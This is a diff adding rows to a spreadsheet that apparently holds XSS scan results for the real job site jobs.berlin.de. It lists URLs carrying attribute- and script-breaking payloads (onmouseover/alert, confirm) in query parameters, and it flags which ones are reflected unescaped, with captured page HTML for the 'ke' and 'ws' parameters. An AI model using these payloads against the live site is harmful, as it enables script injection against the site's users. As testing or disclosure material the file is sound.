+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=' onmouseover='alert`1`&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B128" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C128" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D128" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="129">
+      <c r="A129" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=' onmouseover='alert`1`&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B129" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C129" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D129" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="130">
+      <c r="A130" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs='; confirm`1`; '&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B130" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C130" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D130" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="131">
+      <c r="A131" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID='; confirm`1`; '&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B131" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C131" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D131" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="132">
+      <c r="A132" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID='; confirm`1`; '&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B132" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C132" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D132" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="133">
+      <c r="A133" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=' onmouseover='alert`1`&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B133" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C133" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D133" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="134">
+      <c r="A134" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=' onmouseover='alert`1`&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B134" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C134" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D134" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="135">
+      <c r="A135" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=' onmouseover='alert`1`&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B135" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C135" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D135" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="136">
+      <c r="A136" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField='; confirm`1`; '&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B136" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C136" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D136" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="137">
+      <c r="A137" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=' onmouseover='alert`1`&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B137" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C137" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D137" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="138">
+      <c r="A138" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=' onmouseover='alert`1`&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B138" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C138" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D138" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="139">
+      <c r="A139" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=' onmouseover='alert`1`&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B139" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C139" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D139" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="140">
+      <c r="A140" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin='; confirm`1`; '&amp;ke=
+&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B140" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C140" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D140" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="141">
+      <c r="A141" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=" onmouseover="alert`1`&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B141" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C141" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D141" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="142">
+      <c r="A142" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=' onmouseover='alert`1`&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B142" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C142" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D142" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;form class="" name="SearchBoxName"
+method="GET" action="/" data-search-box="{&amp;quot;siteCountry&amp;quot;:&amp;quot;de&amp;quot;,&amp;quot;language&amp;quot;:&amp;quot;de&amp;quot;,&amp;quot;isExpanded&amp;quot;:true,&amp;quot;HOMEPAGEANDHEADERVARIANT&amp;quot;:null,&amp;quot;quickFilters&amp;quot;:{&amp;quot;workTypeValues&amp;quot;:{&amp;quot;partTime&amp;quot;:80002,&amp;quot;homeOffice&amp;quot;:80005,&amp;quot;fullTime&amp;quot;:80001}},&amp;quot;suid&amp;quot;:&amp;quot;172df212-e67d-4c4c-86ff-b8ca9ab8962f&amp;quot;,&amp;quot;disallowEmptySearchWithRecentSearches&amp;quot;:false,&amp;quot;RADIUSVALUE&amp;quot;:30,&amp;quot;searchOrigin&amp;quot;:&amp;quot;Resultlist_top-search&amp;quot;,&amp;quot;autosuggest&amp;quot;:{&amp;quot;typeTranslations&amp;quot;:{&amp;quot;postalcode&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;company&amp;quot;:&amp;quot;Firma&amp;quot;,&amp;quot;keyword&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;company_cp&amp;quot;:&amp;quot;Firma&amp;quot;,&amp;quot;jobid&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;category&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;geocity&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;skill_facet&amp;quot;:&amp;quot;Kompetenz&amp;quot;,&amp;quot;jd&amp;quot;:&amp;quot;&amp;quot;},&amp;quot;enabled&amp;quot;:true,&amp;quot;queryParamValues&amp;quot;:{&amp;quot;companyType&amp;quot;:false},&amp;quot;type&amp;quot;:&amp;quot;jd,company_cp,skill_facet&amp;quot;},&amp;quot;radius&amp;quot;:{&amp;quot;enabled&amp;quot;:true,&amp;quot;options&amp;quot;:{&amp;quot;values&amp;quot;:[5,10,20,30,40,50,75,100],&amp;quot;defaultIndex&amp;quot;:4}},&amp;quot;showDetailedResultList&amp;quot;:false,&amp;quot;SINGLESEARCHASSISTANT&amp;quot;:{&amp;quot;isAvailable&amp;quot;:false,&amp;quot;displayThreshold&amp;quot;:10,&amp;quot;tooltipTheme&amp;quot;:&amp;quot;stepstone&amp;quot;},&amp;quot;links&amp;quot;:{&amp;quot;formAction&amp;quot;:&amp;quot;/&amp;quot;,&amp;quot;formActionCompany&amp;quot;:&amp;quot;/stellenanzeigen-arbeitgeber.html&amp;quot;,&amp;quot;formActionResultlistMobile&amp;quot;:&amp;quot;resultlist.dspResultList&amp;quot;,&amp;quot;formActionDetails&amp;quot;:&amp;quot;/ergebnisliste.html&amp;quot;,&amp;quot;advancedSearch&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;formActionResultlist&amp;quot;:&amp;quot;/&amp;quot;},&amp;quot;showAdvancedSearchLink&amp;quot;:true,&amp;quot;focusWhatField&amp;quot;:false,&amp;quot;isMobile&amp;quot;:false,&amp;quot;autoSuggestValues&amp;quot;:[],&amp;quot;DISALLOWEMPTYSEARCH&amp;quot;:false,&amp;quot;WHATVALUE&amp;quot;:&amp;quot;' onmouseover='alert`1`&amp;quot;,&amp;quot;RADIUSVALUEFORLABEL&amp;quot;:30,&amp;quot;homeOfficeQuickFilterEnabled&amp;quot;:false,&amp;quot;autosuggestSkillsEnabled&amp;quot;:true,&amp;quot;WHEREVALUE&amp;quot;:&amp;quot;Berlin&amp;quot;,&amp;quot;showQuickFilters&amp;quot;:false}" &gt; , &lt;input type="search" name="ke"
+class="form-control typeahead search-box__field search-box__field-what" placeholder="Jobtitel, Kompetenz oder Firmenname" value="
+' onmouseover='alert`1`"
+autocomplete="off" data-search-box-what
+data-search-box-placeholder data-search-box-autosuggest-type="jd,company_cp,skill_facet"&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="143">
+      <c r="A143" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke='; confirm`1`; '&amp;ws=Berlin</t>
+        </is>
+      </c>
+      <c r="B143" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C143" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D143" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;script type="text/javascript"&gt;
+        var utag_data = {"resultlist__filter_experience_ids":"","page__dynatrace_page_name_device":"resultlist-search-desktop","jobagent__ab_test":"_","page__datalayer_hash_id":"5EBFA9F1-39C7-4AED-AA0C4DB8D70AA624","page__country":"DE","datalayer__version":"3.1","resultlist__results_number_total":"0","resultlist__filter_worktype_ids":"","resultlist__filter_sector_ids_abr":"","resultlist__results_number_onpage":0,"candidate__login_status":"anonymous","resultlist__filter_city_ids":"","page__dev_environment":"live","resultlist__keyword_what_50char":"'; confirm`1`; '","resultlist__filter_sector_ids":"","resultlist__filter_contracttype_ids_abr":"","jobagent__ab_test_name":"","resultlist__filter_skill_ids":"","resultlist__keyword_where_30char":"Berlin","page_type":"resultlist-search","resultlist__filter_worktype_ids_abr":"","resultlist__results_number_regional":0,"resultlist__searchandmatch_query_feedback":"-|-|-_0|0|-_0_0_-_-_0_0","resultlist__keyword_what":"'; confirm`1`; '","resultlist__filter_region_ids_abr":"","page__platform_code_version":"V52-RWD","resultlist__language":"","ssa__suid":"cadac1a9-89f0-4187-9308-94b23f4bec3a","resultlist__results_number_semantic":0,"resultlist__radius":30,"recommender__type":"","candidate__login_source":"","appversion_patch":"1","jobagent__events":[],"user__abtest_version":"","page__section_level1":"candidate","resultlist__listings_visibility_features":"no highlighted, no sponsored, no visited, no salary snippet, no skills","resultlist__page_number":1,"resultlist__type":"search","user__device_type_detected":"desktop","page__section_level2":"search","page__platform_device_type":"responsiveweb","resultlist__listing_values_top10":[],"resultlist__listing_ids":"","resultlist__listing_ids_30val":"","resultlist__filter_skill_ids_abr":"","appversion_source":"release-RM-697","appversion":"5.847.1.2","resultlist__filter_subcategory_ids_abr":"","page__server_id":"live/143.164/tomcat","resultlist__filter_contracttype_ids":"","resultlist__sorting_type":"relevance","candidate__em_hash":"","resultlist__events":["search_number_of_results","search_no_result"],"page__page_type":"resultlist-search","resultlist__filter_category_ids_abr":"","candidate__recognized_id":"","resultlist__keyword_where":"Berlin","resultlist__source_of_search":"Entry","resultlist__filter_subcategory_ids":"","appversion_minor":"847","resultlist__results_number_recommender":0,"resultlist__sorting_type_abr":"r","resultlist__filter_region_ids":"","resultlist__results_number_perpage":25,"event_name":"jobagent__-resultlist__search_number_of_results_search_no_result-discovery__-candidate__[]","resultlist__filter_names_abr":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","user__device_serverside_detected":"desktop","page__language":"DE","resultlist__results_number_mainsection":0,"page__site_id":"stepstone-de-berlin-de","resultlist__filter_city_ids_abr":"","appversion_build":"2","discovery__events":"","appversion_major":"5","resultlist__details_view_type":"small","jobagent__selected_criteria":"","jobagent__ab_test_variant":"","candidate__events":"[]","resultlist__filter_names":"what-freetext_where-freetext_-_-_-_-_-_-_-_-_-_-_radius_-_-","user__experiments_assignments":"","resultlist__filter_names_dyn_var":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","page__pagename":"Resultlist Responsive","resultlist__filter_experience_ids_abr":"","user__notification_experiments_assignments":"","resultlist__filter_category_ids":"","candidate__candidate_id":""};
+    &lt;/script&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="144">
+      <c r="A144" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws=' onmouseover='alert`1`</t>
+        </is>
+      </c>
+      <c r="B144" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C144" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="145">
+      <c r="A145" t="inlineStr">
+        <is>
+          <t>https://jobs.berlin.de/?stf=freeText&amp;ns=1&amp;qs=[]&amp;companyID=0&amp;cityID=0&amp;sourceOfTheSearchField=resultlistpage:general&amp;searchOrigin=Resultlist_top-search&amp;ke=
+&amp;ws='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B145" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C145" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D145" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;script type="text/javascript"&gt;
+        var utag_data = {"resultlist__filter_experience_ids":"","page__dynatrace_page_name_device":"resultlist-search-desktop","jobagent__ab_test":"_","page__datalayer_hash_id":"94FB9605-4580-4540-8A676D5002547508","page__country":"DE","datalayer__version":"3.1","resultlist__results_number_total":8632,"resultlist__filter_worktype_ids":"","resultlist__filter_sector_ids_abr":"","resultlist__results_number_onpage":25,"candidate__login_status":"anonymous","resultlist__filter_city_ids":"","page__dev_environment":"live","resultlist__keyword_what_50char":"\n","resultlist__filter_sector_ids":"","resultlist__filter_contracttype_ids_abr":"","jobagent__ab_test_name":"","resultlist__filter_skill_ids":"","resultlist__keyword_where_30char":"'; confirm`1`; '","page_type":"resultlist-search","resultlist__filter_worktype_ids_abr":"","resultlist__results_number_regional":1508,"resultlist__searchandmatch_query_feedback":"-|-|-_0|1508|-_0_0_-_-_0_0","resultlist__keyword_what":"\n","resultlist__filter_region_ids_abr":"","page__platform_code_version":"V52-RWD","resultlist__language":"","ssa__suid":"452e1e43-9a93-464f-b180-189db964be7b","resultlist__results_number_semantic":0,"resultlist__radius":30,"recommender__type":"","candidate__login_source":"","appversion_patch":"1","jobagent__events":[],"user__abtest_version":"","page__section_level1":"candidate","resultlist__listings_visibility_features":"no highlighted, no sponsored, no visited, no salary snippet, no skills","resultlist__page_number":1,"resultlist__type":"search","user__device_type_detected":"desktop","page__section_level2":"search","page__platform_device_type":"responsiveweb","resultlist__listing_values_top10":[1,1,1,1,1,1,1,1,1,1],"resultlist__listing_ids":"6469263,6468117,6468323,6485559,6485157,6485248,6485252,6485269,6485278,6485289,6485332,6485339,6485360,6485371,6468126,6462195,6462188,6462187,6468115,6456304,6455271,6348950,6348935,6348890,6348872","resultlist__listing_ids_30val":"6469263,6468117,6468323,6485559,6485157,6485248,6485252,6485269,6485278,6485289,6485332,6485339,6485360,6485371,6468126,6462195,6462188,6462187,6468115,6456304,6455271,6348950,6348935,6348890,6348872","resultlist__filter_skill_ids_abr":"","appversion_source":"release-RM-697","appversion":"5.847.1.2","resultlist__filter_subcategory_ids_abr":"","page__server_id":"live/143.250/tomcat","resultlist__filter_contracttype_ids":"","resultlist__sorting_type":"relevance","candidate__em_hash":"","resultlist__events":["search_number_of_results","search_with_result"],"page__page_type":"resultlist-search","resultlist__filter_category_ids_abr":"","candidate__recognized_id":"","resultlist__keyword_where":"'; confirm`1`; '","resultlist__source_of_search":"Entry","resultlist__filter_subcategory_ids":"","appversion_minor":"847","resultlist__results_number_recommender":0,"resultlist__sorting_type_abr":"r","resultlist__filter_region_ids":"","resultlist__results_number_perpage":25,"event_name":"jobagent__-resultlist__search_number_of_results_search_with_result-discovery__-candidate__[]","resultlist__filter_names_abr":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","user__device_serverside_detected":"desktop","page__language":"DE","resultlist__results_number_mainsection":7124,"page__site_id":"stepstone-de-berlin-de","resultlist__filter_city_ids_abr":"","appversion_build":"2","discovery__events":"","appversion_major":"5","resultlist__details_view_type":"small","jobagent__selected_criteria":"","jobagent__ab_test_variant":"","candidate__events":"[]","resultlist__filter_names":"what-freetext_where-freetext_-_-_-_-_-_-_-_-_-_-_radius_-_-","user__experiments_assignments":"","resultlist__filter_names_dyn_var":"fs_wf_-_-_-_-_-_-_-_-_-_-_ra_-_-","page__pagename":"Resultlist Responsive","resultlist__filter_experience_ids_abr":"","user__notification_experiments_assignments":"","resultlist__filter_category_ids":"","candidate__candidate_id":""};
+    &lt;/script&gt; , </t>
+        </is>
+      </c>
+    </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>
